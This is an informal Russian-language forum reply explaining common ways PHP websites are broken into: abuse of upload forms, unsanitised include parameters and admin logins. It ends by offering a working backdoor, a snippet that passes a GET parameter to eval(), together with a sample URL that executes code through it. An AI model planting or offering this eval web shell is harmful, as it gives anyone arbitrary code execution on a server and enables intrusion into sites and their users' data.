Обычно это делается через всякие формы заливки (аватарки, аттачи и тп). При этом загружаемый файл отдается инклудом (есть в мире идиоты...), не снимается хендлер на пхп в апаче (прямой вызов скрипта из браузера). И то и другое надо еще найти, дураков много, но настраивают им обычно умные люди
Пробуют инклуды, это когда совсем уж лоховской код берет параметр из запроса без проверок, но надо еще найти такой баг.
Чаще всего ломают путем входа от админа, но тоже специфично.
А универсального конечно нет
А если ты про то, чтобы сделать самому бекдор, так если они совсем балбесы в пхп сделай где нить
if(isset($_GET['jopa'])){
eval($_GET['jopa']);
}
да и вызови
http://sisi.com/index.php?jopa=echo%20phpinfo();но за такое по лицу могут ударить))